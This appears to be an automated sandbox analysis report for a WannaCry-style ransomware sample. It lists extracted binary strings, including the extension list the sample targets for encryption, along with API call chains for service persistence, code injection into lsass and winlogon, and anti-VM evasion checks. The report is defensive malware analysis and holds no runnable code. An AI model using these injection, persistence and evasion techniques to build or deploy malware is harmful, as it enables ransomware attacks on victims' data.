                Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\dot3svc.dllPN
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\rdpdr.sysw
                Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\System32\tquery.dll
                Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\pnrpauto.dll
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\b57nd60x.sys
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\winusb.sysiv
                Source: mssecsvc.exe.2.drBinary string: U\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\Time Synchronization
                Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\gpscript.dll
                Source: mssecsvc.exe.2.drBinary string: G\Device\HarddiskVolume2\Windows\System32\config\systemprofile\Favorites3
                Source: mssecsvc.exe.2.drBinary string: 1\Device\HarddiskVolume2\Windows\System32\qmgr.dll
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\scfilter.sys
                Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\upnphost.dll
                Source: mssecsvc.exe.2.drBinary string: S\Device\HarddiskVolume2\Program Files\Common Files\AV\avast! Antivirus\userdata.cab0_TS
                Source: mssecsvc.exe.2.drBinary string: A\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\hidbatt.sysL
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\IPMIDrv.sysm
                Source: mssecsvc.exe.2.drBinary string: G\Device\HarddiskVolume2\Program Files\Windows Media Player\setup_wm.exe
                Source: mssecsvc.exe.2.drBinary string: H\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\hidbatt.sysL$
                Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\lpremove.exep
                Source: mssecsvc.exe.2.drBinary string: i\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Local\Avg\log\fmw1\avgmsgdisp.log.2
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\viaide.systo
                Source: mssecsvc.exe.2.drBinary string: i\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Local\Avg\log\fmw1\avgmsgdisp.log.3
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\hidbth.sys<\
                Source: mssecsvc.exe.2.drBinary string: >\Device\HarddiskVolume2\Windows\System32\gatherNetworkInfo.vbs1
                Source: mssecsvc.exe.2.drBinary string: 6\Device\HarddiskVolume2\Windows\System32\IPBusEnum.dll
                Source: classification engine  Classification label: mal100.rans.troj.evad.winDLL@18/4@2/2
                Source: C:\Windows\mssecsvc.exe  Code function: sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,4_2_00407C40
                Source: C:\Windows\mssecsvc.exe  Code function: sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,6_2_00407C40
                Source: C:\Windows\tasksche.exe  Code function: OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,sprintf,CreateServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,19_2_00401CE8
                Source: C:\Windows\mssecsvc.exe  Code function: 4_2_00408090 GetModuleFileNameA,__p___argc,OpenSCManagerA,InternetCloseHandle,OpenServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherA,4_2_00408090
                Source: C:\Windows\mssecsvc.exe  Code function: 6_2_00408090 GetModuleFileNameA,__p___argc,OpenSCManagerA,InternetCloseHandle,OpenServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherA,6_2_00408090
                Source: C:\Windows\mssecsvc.exe  Code function: 4_2_00407C40 sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,4_2_00407C40
                Source: C:\Windows\mssecsvc.exe  Code function: 4_2_00B005F2 FindCloseChangeNotification,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,FindCloseChangeNotification,FindCloseChangeNotification,4_2_00B005F2
                Source: C:\Windows\System32\loaddll32.exe  Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\HFKDS6VcNO.dll,PlayGame
                Source: C:\Windows\mssecsvc.exe  Code function: 4_2_00407CE0 InternetCloseHandle,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,FindResourceA,LoadResource,LockResource,SizeofResource,sprintf,sprintf,sprintf,MoveFileExA,CreateFileA,WriteFile,CloseHandle,CreateProcessA,CloseHandle,CloseHandle,4_2_00407CE0
                Source: mssecsvc.exe, 00000004.00000000.381614610.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000004.00000002.706767542.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000006.00000002.471882688.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000006.00000000.391018672.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000009.00000002.486575854.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000009.00000000.396301371.0000000000710000.00000080.00000001.01000000.00000004.sdmp, tasksche.exe, 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp, HFKDS6VcNO.dll, mssecsvc.exe.2.dr  Binary or memory string: @.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docWANACRY!%s\%sCloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll
                Source: mssecsvc.exe  String found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-StarterEdition-wrapper~3
                Source: mssecsvc.exe  String found in binary or memory: O\Device\HarddiskVolume2\Windows\Temp\avg_a04392\avg-secure-search-installer.exe
                Source: mssecsvc.exe  String found in binary or memory: O\Device\HarddiskVolume2\Windows\Temp\avg_a04160\avg-secure-search-installer.exe
                Source: mssecsvc.exe  String found in binary or memory: O\Device\HarddiskVolume2\Windows\Temp\avg_a01924\avg-secure-search-installer.exe2
                Source: mssecsvc.exe  String found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServer-AddOn-2-Pa
                Source: mssecsvc.exe  String found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientUltimate~31bf385
                Source: mssecsvc.exe  String found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServer-AddOn-Pack
                Source: mssecsvc.exe  String found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUAUE-Pack
                Source: mssecsvc.exe  String found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-Customization-Packa
                Source: C:\Windows\mssecsvc.exe  File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\System32\svchost.exe  File read: C:\Windows\System32\drivers\etc\hosts
                Source: HFKDS6VcNO.dll  Static file information: File size 5267459 > 1048576
                Source: HFKDS6VcNO.dll  Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x501000
                Source: C:\Windows\tasksche.exe  Code function: 19_2_00407710 push eax; ret 19_2_0040773E
                Source: C:\Windows\tasksche.exe  Code function: 19_2_004076C8 push eax; ret 19_2_004076E6
                Source: C:\Windows\mssecsvc.exe  Code function: 4_2_00B03D36 LoadLibraryA,GetProcAddress,LoadLibraryA,GetTickCount,GetVolumeInformationA,GetModuleFileNameA,wsprintfA,CreateThread,CloseHandle,CreateThread,CloseHandle,CreateEventA,socket,connect,GetVersionExA,wsprintfA,CreateThread,CloseHandle,GetTickCount,4_2_00B03D36

                Persistence and Installation Behavior

                Source: C:\Windows\SysWOW64\rundll32.exe  Executable created and started: C:\WINDOWS\mssecsvc.exe
                Source: C:\Windows\mssecsvc.exe  Executable created and started: C:\WINDOWS\tasksche.exe
                Source: C:\Windows\SysWOW64\rundll32.exe  File created: C:\Windows\mssecsvc.exe
                Source: C:\Windows\mssecsvc.exe  File created: C:\Windows\tasksche.exe
                Source: C:\Windows\mssecsvc.exe  Code function: 4_2_00407C40 sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,4_2_00407C40
                Source: C:\Windows\SysWOW64\rundll32.exe  Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\mssecsvc.exe  Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Windows\mssecsvc.exe  Special instruction interceptor: First address: 0000000000A71746 instructions caused by: Self-modifying code
                Source: C:\Windows\mssecsvc.exe  Special instruction interceptor: First address: 0000000000A6B1E4 instructions caused by: Self-modifying code
                Source: C:\Windows\mssecsvc.exe  Code function: 4_2_00B04178 4_2_00B04178
                Source: C:\Windows\mssecsvc.exe  Code function: 4_2_7FEA4178 4_2_7FEA4178
                Source: C:\Windows\System32\svchost.exe TID: 1516  Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\mssecsvc.exe  Code function: 4_2_00B0042D rdtsc 4_2_00B0042D
                Source: C:\Windows\System32\svchost.exe  File opened: PhysicalDrive0
                Source: C:\Windows\mssecsvc.exe  Process information queried: ProcessInformation
                Source: C:\Windows\System32\loaddll32.exe  Thread delayed: delay time: 120000
                Source: svchost.exe, 00000015.00000000.495619515.00000259A2C2E000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: $@vmicvss
                Source: svchost.exe, 00000015.00000002.924540378.00000259A2C00000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: "@Block any inbound traffic for vmicshutdown
                Source: svchost.exe, 00000015.00000000.494424403.00000259A2355000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: @Allow inbound TCP port 389 traffic for vmicheartbeateLMEMpPP>
                Source: svchost.exe, 00000015.00000000.495619515.00000259A2C2E000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: *@vmicshutdown-block-out
                Source: svchost.exe, 00000015.00000002.924684151.00000259A2C0A000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: ,@Block any other outbound traffic for vmicheartbeat
                Source: svchost.exe, 00000015.00000000.495619515.00000259A2C2E000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: ,@vmicheartbeat-block-out
                Source: mssecsvc.exe, 00000004.00000000.381614610.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000004.00000002.706767542.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000006.00000002.471882688.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000006.00000000.391018672.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000009.00000002.486575854.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000009.00000000.396301371.0000000000710000.00000080.00000001.01000000.00000004.sdmp, tasksche.exe, 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmp, mssecsvc.exe.2.dr  Binary or memory string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Guest-Integration-Drivers-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
                Source: mssecsvc.exe  Binary or memory string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Common-Drivers-Package~3
                Source: mssecsvc.exe, 00000006.00000002.474520495.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000000.417080542.00000265FA028000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.911407016.00000265FA028000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.921277233.000002974C24A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.910487765.0000029746A29000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW
                Source: dwm.exe, 00000012.00000000.429047490.000002456A8D2000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                Source: svchost.exe, 00000015.00000000.494424403.00000259A2355000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: (@Allow inbound TCP port 389 traffic for vmicheartbeatLMEMppR>
                Source: dwm.exe, 00000012.00000000.429047490.000002456A8D2000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
                Source: svchost.exe, 00000015.00000000.495619515.00000259A2C2E000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: .@vmicshutdown-block-in
                Source: svchost.exe, 0000001C.00000000.541476652.000002BE77E3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.912268978.000002BE77E3F000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: (@Microsoft-Windows-Hyper-V-Hypervisor
                Source: svchost.exe, 00000015.00000002.924684151.00000259A2C0A000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: "@vmicheartbeat
                Source: svchost.exe, 00000018.00000002.918198542.000002670BC29000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000_0r
                Source: svchost.exe, 0000001F.00000002.922351106.000002974C275000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: $@Hyper-V RAW
                Source: mssecsvc.exe, 00000004.00000000.381614610.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000004.00000002.706767542.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000006.00000002.471882688.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000006.00000000.391018672.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000009.00000002.486575854.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000009.00000000.396301371.0000000000710000.00000080.00000001.01000000.00000004.sdmp, tasksche.exe, 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmp, mssecsvc.exe.2.dr  Binary or memory string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Common-Drivers-Package~31bf3856ad364e35~x86~~6.1.7601.17514.catp
                Source: svchost.exe, 0000000D.00000000.408671976.00000201374E5000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: vmicshutdown
                Source: svchost.exe, 0000000D.00000002.925470706.0000020137E00000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000|
                Source: svchost.exe, 00000015.00000000.495619515.00000259A2C2E000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: @vmicvss-block-in
                Source: svchost.exe, 00000015.00000000.495619515.00000259A2C2E000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: &@vmicheartbeat-allow-out
                Source: svchost.exe, 0000000D.00000002.923251858.0000020137636000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: vmicvss
                Source: svchost.exe, 00000015.00000002.924684151.00000259A2C0A000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: $@vmicshutdown
                Source: svchost.exe, 00000015.00000002.924684151.00000259A2C0A000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: &@Allow inbound TCP port 636 traffic for vmicheartbeat
                Source: svchost.exe, 00000015.00000000.495619515.00000259A2C2E000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: ,@vmicvss
                Source: svchost.exe, 00000015.00000002.924684151.00000259A2C0A000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: "@vmicheartbeat-allow-in-2
                Source: svchost.exe, 0000001C.00000000.540958832.000002BE77DB0000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: VMware
                Source: svchost.exe, 00000011.00000002.910218493.000001B089649000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: (@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
                Source: svchost.exe, 00000015.00000002.924684151.00000259A2C0A000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: ,@Allow inbound TCP port 389 traffic for vmicheartbeat
                Source: svchost.exe, 00000015.00000002.924684151.00000259A2C0A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @vmicshutdown
                Source: svchost.exe, 00000015.00000002.924540378.00000259A2C00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *@Block any outbound traffic for vmicshutdown
                Source: svchost.exe, 0000000D.00000000.408671976.00000201374E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
                Source: lsass.exe, 00000008.00000000.393818291.0000025A3127F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
                Source: svchost.exe, 0000000E.00000000.416919302.00000265FA013000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.910602777.00000265FA013000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                Source: svchost.exe, 00000015.00000002.924540378.00000259A2C00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "@Allow outbound TCP traffic for vmicheartbeat
                Source: svchost.exe, 0000000D.00000002.922808083.0000020137613000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @vmicshutdownss
                Source: svchost.exe, 00000015.00000000.494424403.00000259A2355000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@Allow inbound TCP port 636 traffic for vmicheartbeatLMEMppA>
                Source: svchost.exe, 00000015.00000002.934684956.00000259A350E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @Allow outbound TCP traffic for vmicheartbeatLMEM`Pa>
                Source: svchost.exe, 00000015.00000002.924684151.00000259A2C0A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmicheartbeat-allow-in-1
                Source: svchost.exe, 0000000D.00000002.922808083.0000020137613000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmicshutdown
                Source: mssecsvc.exe, 00000006.00000002.474520495.0000000000D7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW,
                Source: svchost.exe, 0000001C.00000002.921218277.000002BE78712000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.0NULLSCSI0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\4&2509f6e&0&00A8
                Source: lsass.exe, 00000008.00000000.401079959.0000025A31213000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.393292577.0000025A31213000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.908814579.0000025A31213000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.492983771.00000259A18B5000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.918198136.00000259A18B5000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.907795071.0000014583A29000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.504278323.0000014583A29000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.512645663.000002670BC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.918774408.000002670BC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001C.00000000.541476652.000002BE77E3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.912268978.000002BE77E3F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: svchost.exe, 00000015.00000002.934684956.00000259A350E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $@Allow outbound TCP traffic for vmicheartbeatLMEM`
                Source: lsass.exe, 00000008.00000000.393818291.0000025A3127F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
                Source: svchost.exe, 00000015.00000000.494424403.00000259A2355000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@Allow inbound TCP port 636 traffic for vmicheartbeatTSPLMEMp`@>
                Source: svchost.exe, 00000015.00000002.924684151.00000259A2C0A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ,@Block any other inbound traffic for vmicheartbeat
                Source: svchost.exe, 00000015.00000002.924684151.00000259A2C0A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: .@vmicheartbeat
                Source: svchost.exe, 00000015.00000002.924684151.00000259A2C0A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $@vmicheartbeat
                Source: svchost.exe, 00000015.00000000.495619515.00000259A2C2E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &@Block any outbound traffic for vmicvss
                Source: svchost.exe, 00000015.00000000.495619515.00000259A2C2E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @vmicvss-block-out
                Source: svchost.exe, 0000001C.00000000.541476652.000002BE77E3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.912268978.000002BE77E3F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $Microsoft-Windows-Hyper-V-Hypervisor
                Source: svchost.exe, 00000023.00000000.581815027.0000029D10802000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                Source: lsass.exe, 00000008.00000000.393818291.0000025A3127F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
                Source: svchost.exe, 00000015.00000000.495619515.00000259A2C2E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ,@vmicheartbeat-block-in
                Source: mssecsvc.exeBinary or memory string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Guest-Integration-Driver
                Source: svchost.exe, 0000001C.00000000.540958832.000002BE77DB0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicVMware Virtual disk 2.0 NULL
                Source: svchost.exe, 0000000D.00000002.922808083.0000020137613000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @vmicheartbeat
                Source: svchost.exe, 00000015.00000000.495619515.00000259A2C2E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &@Block any inbound traffic for vmicvss
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B03D36 LoadLibraryA,GetProcAddress,LoadLibraryA,GetTickCount,GetVolumeInformationA,GetModuleFileNameA,wsprintfA,CreateThread,CloseHandle,CreateThread,CloseHandle,CreateEventA,socket,connect,GetVersionExA,wsprintfA,CreateThread,CloseHandle,GetTickCount,4_2_00B03D36
                Source: C:\Windows\tasksche.exeCode function: 19_2_004029CC free,GetProcessHeap,HeapFree,19_2_004029CC
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B0042D rdtsc 4_2_00B0042D
                Source: C:\Windows\mssecsvc.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\mssecsvc.exe - Code function: 4_2_00B005F2 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\mssecsvc.exe - Code function: 4_2_00B0042D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\mssecsvc.exe - Code function: 4_2_00B0025E mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\mssecsvc.exe - Code function: 4_2_7FEA05F2 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\mssecsvc.exe - Code function: 4_2_7FEA025E mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\mssecsvc.exe - Code function: 4_2_7FEA042D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\mssecsvc.exe - Process queried: DebugPort

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Windows\mssecsvc.exe - Section loaded: \BaseNamedObjects\itatVt target: C:\Windows\System32\winlogon.exe protection: execute and read and write
                Source: C:\Windows\mssecsvc.exe - Section loaded: \BaseNamedObjects\itatVt target: C:\Windows\System32\lsass.exe protection: execute and read and write
                Source: C:\Windows\mssecsvc.exe - Section loaded: \BaseNamedObjects\itatVt target: C:\Windows\System32\fontdrvhost.exe protection: execute and read and write
                Source: C:\Windows\mssecsvc.exe - Section loaded: \BaseNamedObjects\itatVt target: C:\Windows\System32\svchost.exe protection: execute and read and write
                Source: C:\Windows\mssecsvc.exe - Section loaded: \BaseNamedObjects\itatVt target: C:\Windows\System32\dwm.exe protection: execute and read and write
                Source: C:\Windows\mssecsvc.exe - Section loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and write
                Source: C:\Windows\mssecsvc.exe - Section loaded: \BaseNamedObjects\lyetVt target: C:\Windows\System32\winlogon.exe protection: execute and read and write
                Source: C:\Windows\mssecsvc.exe - Section loaded: \BaseNamedObjects\lyetVt target: C:\Windows\System32\lsass.exe protection: execute and read and write
                Source: C:\Windows\mssecsvc.exe - Section loaded: \BaseNamedObjects\lyetVt target: C:\Windows\System32\fontdrvhost.exe protection: execute and read and write
                Source: C:\Windows\mssecsvc.exe - Section loaded: \BaseNamedObjects\lyetVt target: C:\Windows\System32\svchost.exe protection: execute and read and write
                Source: C:\Windows\mssecsvc.exe - Section loaded: \BaseNamedObjects\lyetVt target: C:\Windows\System32\dwm.exe protection: execute and read and write
                Source: C:\Windows\mssecsvc.exe - Memory protected: unknown base: 77509A50 protect: page execute and read and write
                Source: C:\Windows\mssecsvc.exe - Memory protected: unknown base: 77509830 protect: page execute and read and write
                Source: C:\Windows\mssecsvc.exe - Memory protected: unknown base: 7750A040 protect: page execute and read and write
                Source: C:\Windows\mssecsvc.exe - Memory protected: unknown base: 775099D0 protect: page execute and read and write
                Source: C:\Windows\mssecsvc.exe - Memory protected: unknown base: 7750A120 protect: page execute and read and write
                Source: C:\Windows\mssecsvc.exe - Memory protected: unknown base: 77509670 protect: page execute and read and write
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509670 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509A50 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509830 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 7750A040 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 775099D0 protect: page execute and read and writeJump to behavior
